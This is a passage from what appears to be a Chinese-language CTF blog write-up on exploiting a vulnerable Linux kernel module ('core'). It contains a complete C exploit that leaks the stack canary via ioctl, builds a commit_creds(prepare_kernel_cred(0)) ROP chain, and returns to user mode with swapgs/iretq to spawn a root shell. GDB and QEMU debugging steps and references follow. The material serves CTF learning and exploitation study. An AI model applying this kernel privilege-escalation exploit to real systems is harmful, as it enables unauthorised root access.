最后 core_release 只是有一个 printk 输出：

__int64 core_release()
{
  printk(&unk_204);
  return 0LL;
}

综上整理一下不难发现，我们可以任意地址读、可以往一个全局变量和一个函数中的局部变量写，那么就有下面的 ROP 思路：

使用 ioctl 设置全局变量 off，然后调用 core_read 来泄漏 Canary；
使用 core_write 向 name 写入 ROP 链（构造 commit_creds(prepare_kernel_cred(0))，地址通过 /tmp/kallsyms 中的内容获取）；
使用 core_copy_func 把 name 上构造的 ROP 链写到局部变量上；
最后返回用户态调用 system("/bin/sh")（通过 swapgs ; iretq 两条指令来恢复寄存器和返回用户态）。

关于找 Gadget 的方法，M4x 师傅说是用 ropper，但我个人感觉 ROPgadget 更快。
$ ROPgadget --binary ./vmlinux > gadgets
ireq 可以用 objdump 来找。

Exploit：

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ioctl.h>

void spawn_shell() {
  if (!getuid()) {
        system("/bin/sh");
        exit(0);
    } else {
        puts("[!] UID != 0");
        exit(-1);
    }
}

size_t commit_creds, prepare_kernel_cred;
size_t raw_vmlinux_base = 0xffffffff81000000;
size_t vmlinux_base = 0;

size_t find_symbols() {
    FILE *kallsyms_fd = fopen("/tmp/kallsyms", "r");
    if (kallsyms_fd < 0) {
        puts("[!] Open /tmp/kallsyms error...");
        exit(-1);
    }

    char buf[0x30];
    while(fgets(buf, 0x30, kallsyms_fd)) {
        if (commit_creds & prepare_kernel_cred)
            return 0;

        if (strstr(buf, "commit_creds") && !commit_creds) {
            char hex[20];
            strncpy(hex, buf, 16);
            sscanf(hex, "%llx", &commit_creds);
            printf("commit_creds => %p.\n", commit_creds);
            vmlinux_base = commit_creds - 0x9c8e0;
            printf("vmlinux_base => %p.\n", vmlinux_base);
        }

        if (strstr(buf, "prepare_kernel_cred") && !prepare_kernel_cred) {
            char hex[20];
            strncpy(hex, buf, 16);
            sscanf(hex, "%llx", &prepare_kernel_cred);
            printf("prepare_kernel_cred => %p.\n", prepare_kernel_cred);
            vmlinux_base = prepare_kernel_cred - 0x9cce0;
            printf("vmlinux_base => %p.\n", vmlinux_base);
        }
    }

    if (!(prepare_kernel_cred & commit_creds)) {
        puts("[*] Error...");
        exit(-1);
    }
}

size_t user_cs, user_ss, user_rflags, user_sp;

void save_status() {
    __asm__(
        "mov user_cs, cs;\n"
        "mov user_ss, ss;\n"
        "mov user_sp, sp;\n"
        "pushf;"
        "pop user_rflags;\n"
    );
    puts("[*] User status has been saved.");
}

void set_off(int fd, long long idx) {
    printf("[*] Set off = %ld.\n", idx);
    ioctl(fd, 0x6677889C, idx);
}

void core_read(int fd, char *buf) {
    puts("[*] Read to buf!");
    ioctl(fd, 0x6677889B, buf);
}

void core_copy_func(int fd, long long size) {
    printf("[*] Copy %ld byte(s) from user.\n", size);
    ioctl(fd, 0x6677889A, size);
}

uint64_t pop_rdi_ret = 0xffffffff81000b2f;
uint64_t pop_rdx_ret = 0xffffffff810a0f49;
uint64_t pop_rcx_ret = 0xffffffff81021e53;
uint64_t mov_rdi_rax_call_rdx = 0xffffffff8101aa6a;
uint64_t swapgs_popfq_ret = 0xffffffff81a012da;
uint64_t iretq_ret = 0xffffffff81050ac2;

int main() {
    save_status();
    int fd = open("/proc/core", 2);
    if(fd < 0) {
        puts("[*] Open /proc/core error...");
        exit(-1);
    }

    find_symbols();
    // gadget = raw_gadget - raw_vmlinux_base + vmlinux_base;
    ssize_t offset = vmlinux_base - raw_vmlinux_base;

    set_off(fd, 0x40);
    char buf[0x40];
    core_read(fd, buf);
    size_t canary = ((size_t *)buf)[0];
    printf("[+] Canary = %p\n", canary);

    size_t rop[0x1000] = {0};

    int i;
    for (i = 0; i < 10; i++)
        rop[i] = canary;
    // prepare_kernel_cred(0)
    rop[i++] = pop_rdi_ret + offset;
    rop[i++] = 0;
    rop[i++] = prepare_kernel_cred;

    // ...
    rop[i++] = pop_rdx_ret + offset; // pop rdx ; ret
    rop[i++] = pop_rcx_ret + offset; // pop rcx ; ret
    rop[i++] = mov_rdi_rax_call_rdx + offset; // mov rdi, rax ; call rdx
    rop[i++] = commit_creds;

    // Restore registers
    rop[i++] = swapgs_popfq_ret + offset;
    rop[i++] = 0;

    rop[i++] = iretq_ret + offset;

    rop[i++] = (size_t)spawn_shell; // rip

    rop[i++] = user_cs;
    rop[i++] = user_rflags;
    rop[i++] = user_sp;
    rop[i++] = user_ss;

    write(fd, rop, 0x800); // Write rop chain
    core_copy_func(fd, 0xffffffffffff0000 | (0x100));
    return 0;
}

Debug with gdb

进行调试的话一般要先在 QEMU 启动脚本中添加 -gdb tcp::1234 参数（-s 参数同理）。然后用 gdb ./vmlinux 启动 GDB（如果没有 vmlinux 需要提前提取）。接下来在 gdb 中添加调试符号：

add-symbol-file /path/to/lkms/example.ko [offset]

offset 的值通过在 QEMU 中运行 lsmod 来得到：
/ $ lsmod
core 16384 0 - Live 0xffffffffc0211000 (O)
或者可以修改启动脚本以 root 权限来查看 /sys/module/core/sections/.text 段的值：
/ # cat /sys/module/core/sections/.text
0xffffffffc0211000

然后就可以 target remote localhost:1234 开始调试了：

$ gdb ./vmlinux -q
GEF for linux ready, type `gef' to start, `gef config' to configure
80 commands loaded for GDB 7.11.1 using Python engine 3.5
Reading symbols from ./vmlinux...(no debugging symbols found)...done.
gef➤  add-symbol-file fs/core.ko 0xffffffffc027a000
add symbol table from file "fs/core.ko" at
    .text_addr = 0xffffffffc027a000
Reading symbols from fs/core.ko...(no debugging symbols found)...done.
gef➤  b core_read
Breakpoint 1 at 0xffffffffc027a063
gef➤  target remote localhost:1234
Remote debugging using localhost:1234
0xffffffffa6a6e7d2 in ?? ()

[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────── registers ────
$rax   : 0xffffffffa6a6e7d0  →  0x2e66001f0fc3f4fb  →  0x2e66001f0fc3f4fb
$rbx   : 0xffffffffa7410480  →  0x0000000080000000  →  0x0000000080000000
$rcx   : 0x0000000000000000  →  0x0000000000000000
$rdx   : 0x0000000000000000  →  0x0000000000000000
$rsp   : 0xffffffffa7403eb8  →   movabs al, ds:0xc2ffffffffa62b65
$rbp   : 0x0000000000000000  →  0x0000000000000000
$rsi   : 0x0000000000000000  →  0x0000000000000000
$rdi   : 0x0000000000000000  →  0x0000000000000000
$rip   : 0xffffffffa6a6e7d2  →  0x1f0f2e66001f0fc3  →  0x1f0f2e66001f0fc3
$r8    : 0xffff8d484641bf20  →   (bad)
$r9    : 0x0000000000000000  →  0x0000000000000000
$r10   : 0x0000000000000000  →  0x0000000000000000
$r11   : 0x000000000000018c  →  0x000000000000018c
$r12   : 0xffffffffa7410480  →  0x0000000080000000  →  0x0000000080000000
$r13   : 0xffffffffa7410480  →  0x0000000080000000  →  0x0000000080000000
$r14   : 0x0000000000000000  →  0x0000000000000000
$r15   : 0x0000000000000000  →  0x0000000000000000
$eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0010 $ss: 0x0018 $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
───────────────────────────────────────────────────────────────────── stack ────
[!] Unmapped address
─────────────────────────────────────────────────────────────── code:x86:64 ────
   0xffffffffa6a6e7cf                  nop
   0xffffffffa6a6e7d0                  sti
   0xffffffffa6a6e7d1                  hlt
   0xffffffffa6a6e7d2                  ret
   0xffffffffa6a6e7d3                  nop    DWORD PTR [rax]
   0xffffffffa6a6e7d6                  nop    WORD PTR cs:[rax+rax*1+0x0]
   0xffffffffa6a6e7e0                  mov    rax, QWORD PTR gs:0x14d40
   0xffffffffa6a6e7e9                  or     BYTE PTR ds:[rax+0x2], 0x20
   0xffffffffa6a6e7ee                  mov    rdx, QWORD PTR [rax]
─────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0xffffffffa6a6e7d2 in ?? (), reason: SIGTRAP
───────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffffa6a6e7d2 → ret
[#1] 0xffffffffa62b65a0 → jmp 0xffffffffa62b6541
[#2] 0xc2 → irq_stack_union()
[#3] 0xffffffffa78c4900 → int3
[#4] 0xffff8d48466d4900 → jb 0xffff8d48466d4971
[#5] 0xffffffffa78cc2c0 → int3
────────────────────────────────────────────────────────────────────────────────
gef➤

References

https://ctf-wiki.github.io/ctf-wiki/pwn/linux/kernel/basic_knowledge-zh/
http://m4x.fun/post/linux-kernel-pwn-abc-1/
https://richardustc.github.io/2013-05-21-2013-05-21-min-mmap-addr.html
https://blog.csdn.net/jhyboss/article/details/76505873
https://www.cnblogs.com/skywang12345/archive/2013/05/15/driver_class.html
https://www.anquanke.com/post/id/86490
https://blog.csdn.net/m0_38100569/article/details/100673103
http://eternalsakura13.com/2018/03/31/b_core/

ctf pwn linux

本博客所有文章除特别声明外，均采用 CC BY-SA 3.0协议。转载请注明出处！

Tcache Stashing Unlink Attack

House of All in One